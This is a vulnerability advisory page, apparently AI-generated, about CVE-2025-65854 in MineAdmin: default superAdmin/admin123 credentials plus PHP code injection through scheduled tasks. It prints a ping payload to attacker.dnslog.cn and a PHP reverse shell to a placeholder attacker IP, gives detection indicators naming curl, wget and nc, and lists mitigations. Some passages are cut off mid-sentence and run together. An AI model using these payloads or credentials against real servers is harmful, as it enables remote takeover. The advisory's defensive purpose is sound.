
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-65854 is a critical insecure default credentials and code injection vulnerability in MineAdmin v3.x that allows unauthenticated attackers to execute arbitrary commands and perform a full account takeover. The vulnerability affects MineAdmin versions up to and including 3.0.9 (Composer package mineadmin/mineadmin), with no patched version currently listed in the GitHub Advisory Database. It was published on December 12, 2025, with a CVSS v3.1 base score of 9.8 (Critical) (GitHub Advisory, Feedly).
The root cause is twofold: MineAdmin ships with insecure default credentials (superAdmin / admin123) hardcoded in the installation command (InstallProjectCommand.php), and the scheduled tasks feature lacks proper authorization controls, enabling code injection (CWE-94) (GitHub Advisory). An attacker authenticates using the default credentials (or brute-forces the password), then navigates to the "Tools" → "Scheduled Tasks" → "Add" interface and injects a malicious PHP payload — such as eval('system("ping -c 4 attacker.dnslog.cn");'); or a reverse shell — into the task definition field (GitHub Gist). Executing the task once triggers server-side PHP code evaluation with no further privileges required beyond the initial login.
Successful exploitation grants an attacker full remote code execution on the MineAdmin server, enabling arbitrary command execution, complete account takeover, and access to all application data. Confidentiality, integrity, and availability are all fully compromised — an attacker can read, modify, or delete sensitive data, install backdoors, or pivot to other systems on the network (GitHub Advisory, Feedly).
No public proof-of-concept exploit code has been formally released, though the GitHub Gist by SourByte05 provides detailed exploitation steps including specific payloads for command execution and reverse shell establishment (GitHub Gist). There is no confirmed evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.069–0.091%, placing it in the 26th percentile for exploitation likelihood within 30 days (GitHub Advisory). The trivial exploitation path — default credentials plus a built-in task scheduler — significantly lowers the barrier for opportunistic attackers.
superAdmin / admin123). If changed, attempt credential brute-force against the login endpoint.eval('system("ping -c 4 attacker.dnslog.cn");');. For a reverse shell: eval('$s=stream_socket_client("tcp://[ATTACKER_IP]:[PORT]");proc_open("/bin/sh -i", array(0=>$s,1=>$s,2=>$s),$p);');/api/system/scheduledTask) with unusual or encoded payload content; repeated failed login attempts to the superAdmin account followed by a successful login./bin/sh, bash, curl, wget, nc); proc_open or stream_socket_client function calls visible in PHP process monitoring.No patched version is currently listed in the GitHub Advisory Database for the mineadmin/mineadmin Composer package (all versions ≤ 3.0.9 are affected) (GitHub Advisory). Immediate mitigations include: (1) Change the default superAdmin password immediately from admin123 to a strong, unique password; (2) Disable or restrict access to the Scheduled Tasks feature if not operationally required; (3) Implement network-level access controls to limit administrative panel access to trusted IP ranges only; (4) Monitor for unauthorized task creation or execution in application logs; (5) Conduct a security audit of the MineAdmin instance for signs of prior compromise. Monitor the GitHub Advisory for patch availability.
The vulnerability was noted in a Bluesky post shortly after disclosure and picked up by several vulnerability aggregation platforms including VulnDB, CVEFeed, and INCIBE-CERT (Feedly). It was also included in a monthly CVE threat report for December 2025. Community reaction has been limited, with no major vendor statements or prominent researcher commentary beyond the initial disclosure gist by SourByte05.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."